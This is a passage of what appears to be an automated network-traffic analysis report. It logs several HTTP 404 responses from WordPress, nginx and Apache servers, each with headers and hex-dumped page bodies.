74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 20 26 72 61 71 75 6f 3b 20 46 65 65 64 20 64 65 20 6c 6f 73 20 63 6f 6d 65 6e 
74 61 72 69 6f 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.26.1
                Date: Tue, 03 Sep 2024 11:54:15 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip
                Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.26.1
                Date: Tue, 03 Sep 2024 11:54:18 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip
                Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.26.1
                Date: Tue, 03 Sep 2024 11:54:20 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Content-Encoding: gzip
                Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 03 Sep 2024 11:54:23 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:34 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 11:54:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:42 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 